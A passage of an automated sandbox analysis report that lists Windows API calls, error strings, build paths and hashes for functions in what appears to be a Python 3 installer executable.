                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastModuleName
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\pathutil.cpp
                                                                                                                                  • API String ID: 2776309574-537661423
                                                                                                                                  • Opcode ID: 1d371dd3839bf8b7f846fd5ac87b219cb42cfcea2d96657e31fc3c4f9ee9d66d
                                                                                                                                  • Instruction ID: 2945d4c6dc485abdc6c5f1066def62db4b0deb0d82e2bdeca1af627c937b4036
                                                                                                                                  • Opcode Fuzzy Hash: 1d371dd3839bf8b7f846fd5ac87b219cb42cfcea2d96657e31fc3c4f9ee9d66d
                                                                                                                                  • Instruction Fuzzy Hash: 44F0C8739016307787217E5A5C49E4FAA9C9F41F62B164927FE45AB200D669DD0087E8
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 004865E1
                                                                                                                                    • Part of subcall function 004C0F42: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,00485F1B,00000000), ref: 004C0F57
                                                                                                                                    • Part of subcall function 004C0F42: GetProcAddress.KERNEL32(00000000), ref: 004C0F5E
                                                                                                                                    • Part of subcall function 004C0F42: GetLastError.KERNEL32(?,?,?,?,00485F1B,00000000), ref: 004C0F79
                                                                                                                                    • Part of subcall function 00485D4F: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00485DD5
                                                                                                                                  Strings
                                                                                                                                  • Failed to set variant value., xrefs: 0048661E
                                                                                                                                  • Failed to get 64-bit folder., xrefs: 00486604
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                                                                                                  • String ID: Failed to get 64-bit folder.$Failed to set variant value.
                                                                                                                                  • API String ID: 3109562764-2681622189
                                                                                                                                  • Opcode ID: 6ce291015ee9618dae624c9863fdabe693157c2fd3dea45cbea0f9c1610e9251
                                                                                                                                  • Instruction ID: 500150279242dccb9520a5c19cb72eccf20b4cc7917b457184a6c8f1c8fbd636
                                                                                                                                  • Opcode Fuzzy Hash: 6ce291015ee9618dae624c9863fdabe693157c2fd3dea45cbea0f9c1610e9251
                                                                                                                                  • Instruction Fuzzy Hash: 1201A232D00124FBCB51BB91DD06E9E7B68DB04725F11446BF80076150E779AF4097CC
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,?,?,?,00000000,?,?,?,00498758,00000000,00000000,00000000,00000000,00000000), ref: 004C4D5F
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00498758,00000000,00000000,00000000,00000000,00000000), ref: 004C4D69
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\fileutil.cpp, xrefs: 004C4D8D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\fileutil.cpp
                                                                                                                                  • API String ID: 2976181284-3168567549
                                                                                                                                  • Opcode ID: bc1eb84150f0edad86c2f11961ce2f2236e14b6728e2c481c808ad7ac16b9b85
                                                                                                                                  • Instruction ID: 7f9dd79acb9bb0d4f5afdec889eca1d894eac0b2d27b2df16bccb4179aaa22a1
                                                                                                                                  • Opcode Fuzzy Hash: bc1eb84150f0edad86c2f11961ce2f2236e14b6728e2c481c808ad7ac16b9b85
                                                                                                                                  • Instruction Fuzzy Hash: 1AF08676500229AB9B51AF45DD05E9B7E68EF44760B014069FD06A7350D634DD10D7E4
                                                                                                                                  APIs
                                                                                                                                  • CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,004854DE,?,00000000,004854DE,?,?,?), ref: 004C4217
                                                                                                                                  • CoCreateInstance.OLE32(00000000,00000000,00000001,004E7B6C,?), ref: 004C422F
                                                                                                                                  Strings
                                                                                                                                  • Microsoft.Update.AutoUpdate, xrefs: 004C4212
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFromInstanceProg
                                                                                                                                  • String ID: Microsoft.Update.AutoUpdate
                                                                                                                                  • API String ID: 2151042543-675569418
                                                                                                                                  • Opcode ID: 5ed5ed17a8ba5ee7d406886f903c8cd26e8821debe5a197efead213a9751d1a4
                                                                                                                                  • Instruction ID: d49f35b68cdd516b4074571c4ebac688d2c7a6399fa1c9a28eec1a7517be7b06
                                                                                                                                  • Opcode Fuzzy Hash: 5ed5ed17a8ba5ee7d406886f903c8cd26e8821debe5a197efead213a9751d1a4
                                                                                                                                  • Instruction Fuzzy Hash: DCF03071A10648BFDB00DBA9DD46EEFB7B8DB48714F500466EA01E6150D674AA0486AA
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 004862E9
                                                                                                                                    • Part of subcall function 004C0E3A: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,004862F5,00000000), ref: 004C0E4C
                                                                                                                                    • Part of subcall function 004C0E3A: GetProcAddress.KERNEL32(00000000), ref: 004C0E53
                                                                                                                                    • Part of subcall function 004C0E3A: GetLastError.KERNEL32(?,?,?,004862F5,00000000), ref: 004C0E72
                                                                                                                                  Strings
                                                                                                                                  • Failed to set variant value., xrefs: 0048631C
                                                                                                                                  • Failed to get native machine value., xrefs: 004862FB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressCurrentErrorHandleLastModuleProcProcess
                                                                                                                                  • String ID: Failed to get native machine value.$Failed to set variant value.
                                                                                                                                  • API String ID: 896058289-851826934
                                                                                                                                  • Opcode ID: 516515edd1d9ae10791acce5cbf3c6be064764222a8d3c203ebbdfc95a95d87a
                                                                                                                                  • Instruction ID: b676e05050e20f94b07781a05ea4a44d61d0bc765a5d02e385f9eb1f67c93f31
                                                                                                                                  • Opcode Fuzzy Hash: 516515edd1d9ae10791acce5cbf3c6be064764222a8d3c203ebbdfc95a95d87a
                                                                                                                                  • Instruction Fuzzy Hash: F9F0A772D40134F6DB52B79A9D06EAE6A5CDB00765B51441FFD04E6240DB2CDE0083ED
                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 004C367F
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004C36AF
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\xmlutil.cpp, xrefs: 004C3693
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\xmlutil.cpp
                                                                                                                                  • API String ID: 344208780-3319182157
                                                                                                                                  • Opcode ID: f5785c9bf60ec72124671d29c0345225f209ed85d0c188ba908f30a6cb730aab
                                                                                                                                  • Instruction ID: 20b0612b2456e4e6b1aa729438c85960e11d1b283b72c2df95ae8e6ec10069a8
                                                                                                                                  • Opcode Fuzzy Hash: f5785c9bf60ec72124671d29c0345225f209ed85d0c188ba908f30a6cb730aab
                                                                                                                                  • Instruction Fuzzy Hash: 6BF0B435200254F7C7312E149C08F6F77A5EB84B66F15806EFC045B310C7788E10AAE9
                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 004C3924
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004C3954
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\xmlutil.cpp, xrefs: 004C393B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\xmlutil.cpp
                                                                                                                                  • API String ID: 344208780-3319182157
                                                                                                                                  • Opcode ID: c73f4331f12f63b39cc58522dbdc3cc550f7f26b2db7cb53ae98c9226c3e81ad
                                                                                                                                  • Instruction ID: cf1f0a8157dffe66bad4939cfc7619833c952cafceabd8a11ddf39ab53503ef6
                                                                                                                                  • Opcode Fuzzy Hash: c73f4331f12f63b39cc58522dbdc3cc550f7f26b2db7cb53ae98c9226c3e81ad
                                                                                                                                  • Instruction Fuzzy Hash: E9F09075100295E7CB625E499C08F6B7BA8EB84B72F11812EFD059721087B88A40DAE9
                                                                                                                                  APIs
                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,004B72D1), ref: 004B92E8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                  • String ID: HJ$InitializeCriticalSectionEx
                                                                                                                                  • API String ID: 2593887523-1192008887
                                                                                                                                  • Opcode ID: ad303eb81a3be5f6ddd7c54a46b9b48367d8656d11a6916aec710030f388c188
                                                                                                                                  • Instruction ID: bb324e45465a9f2926db00c67ea48fc28d18d41571d2f20c43a80a19e30d611e
                                                                                                                                  • Opcode Fuzzy Hash: ad303eb81a3be5f6ddd7c54a46b9b48367d8656d11a6916aec710030f388c188
                                                                                                                                  • Instruction Fuzzy Hash: FAE09231940259B7CB122F52DC0ADDE7F15EB44B62F1084A2FE1856160C77A8D20AAD8
                                                                                                                                  APIs
                                                                                                                                  • try_get_function.LIBVCRUNTIME ref: 004B1031
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: try_get_function
                                                                                                                                  • String ID: FlsAlloc$HJ
                                                                                                                                  • API String ID: 2742660187-155223487
                                                                                                                                  • Opcode ID: 57a0e7c96bf10462792577b6c041108afda1c98a68e282c724d233ec9c7f86fc
                                                                                                                                  • Instruction ID: 7c173cf7eca42c4a9daa6195e419ab143f60780c4a732cafecd94193e23f5be2
                                                                                                                                  • Opcode Fuzzy Hash: 57a0e7c96bf10462792577b6c041108afda1c98a68e282c724d233ec9c7f86fc
                                                                                                                                  • Instruction Fuzzy Hash: E0D0C2317C02A867D2103296AC06FEA7A98D700FA7F4801B3F90C513E286AD080042D8
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Alloc
                                                                                                                                  • String ID: FlsAlloc$HJ
                                                                                                                                  • API String ID: 2773662609-155223487
                                                                                                                                  • Opcode ID: d95fc24e1845a1b156f3350c0052f69c3150d297eeff0139de619d8447215f07
                                                                                                                                  • Instruction ID: 7f823b9a93f826e74fb6953a87229ffbb9fa83c3d95505124986d7e82690fded
                                                                                                                                  • Opcode Fuzzy Hash: d95fc24e1845a1b156f3350c0052f69c3150d297eeff0139de619d8447215f07
                                                                                                                                  • Instruction Fuzzy Hash: B3E0CD3168436A779212265B5C0EE997908DF50BA3F140563FF0456150DA9D0E01D1ED
                                                                                                                                  APIs
                                                                                                                                  • GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 004C12F4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc
                                                                                                                                  • String ID: AdvApi32.dll$RegDeleteKeyExW
                                                                                                                                  • API String ID: 190572456-850864035
                                                                                                                                  • Opcode ID: 86f3cdf3e1d5f7d59391c25e4261a8146577f9c30b6688d875e5707815277ffa
                                                                                                                                  • Instruction ID: 60e253a9d52a8c486f5cf66f6b4d385bfc2a1cfb75cca7e0f29d9c4726f45541
                                                                                                                                  • Opcode Fuzzy Hash: 86f3cdf3e1d5f7d59391c25e4261a8146577f9c30b6688d875e5707815277ffa
                                                                                                                                  • Instruction Fuzzy Hash: 24E0EC30A413E39BD3615B1EACC9B493AD1F711B9AF11013AE814AA272D3794C428F8C